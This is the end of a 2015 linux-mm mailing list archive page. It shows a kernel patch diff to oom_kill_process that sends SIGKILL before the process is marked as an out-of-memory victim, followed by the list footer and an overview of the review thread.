@@ -555,6 +555,8 @@ void oom_kill_process(struct oom_control *oc, struct task_struct *p,
 	/* Get a reference to safely compare mm after task_unlock(victim) */
 	mm = victim->mm;
 	atomic_inc(&mm->mm_users);
+	/* Send SIGKILL before setting TIF_MEMDIE. */
+	do_send_sig_info(SIGKILL, SEND_SIG_FORCED, victim, true);
 	mark_oom_victim(victim);
 	pr_err("Killed process %d (%s) total-vm:%lukB, anon-rss:%lukB, file-rss:%lukB\n",
 		task_pid_nr(victim), victim->comm, K(victim->mm->total_vm),
@@ -586,7 +588,6 @@ void oom_kill_process(struct oom_control *oc, struct task_struct *p,
 		}
 	rcu_read_unlock();
 
-	do_send_sig_info(SIGKILL, SEND_SIG_FORCED, victim, true);
 	mmput(mm);
 	put_task_struct(victim);
 }
-- 
1.8.3.1

--
To unsubscribe, send a message with 'unsubscribe linux-mm' in
the body to majordomo@kvack.org.  For more info on Linux MM,
see: http://www.linux-mm.org/ .
Don't email: <a href=mailto:"dont@kvack.org"> email@kvack.org </a>

^ permalink raw reply	[flat|nested] 14+ messages in thread

end of thread, other threads:[~2015-08-27 14:04 UTC | newest]

Thread overview: 14+ messages (download: mbox.gz / follow: Atom feed)
-- links below jump to the message on this page --
2015-08-23  7:19 [REPOST] [PATCH 2/2] mm,oom: Reverse the order of setting TIF_MEMDIE and sending SIGKILL Tetsuo Handa
2015-08-24  9:47 ` Michal Hocko
2015-08-25 12:06   ` Tetsuo Handa
2015-08-25 14:17     ` Michal Hocko
2015-08-25 14:37       ` Tetsuo Handa
2015-08-25 15:20         ` Michal Hocko
2015-08-26 14:12 ` Michal Hocko
2015-08-26 14:28   ` Oleg Nesterov
2015-08-27  8:38     ` Michal Hocko
2015-08-26 15:03 ` Tetsuo Handa
2015-08-27  8:40   ` Michal Hocko
2015-08-27 11:11     ` Tetsuo Handa
2015-08-27 11:34       ` Michal Hocko
2015-08-27 14:03         ` Tetsuo Handa

This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox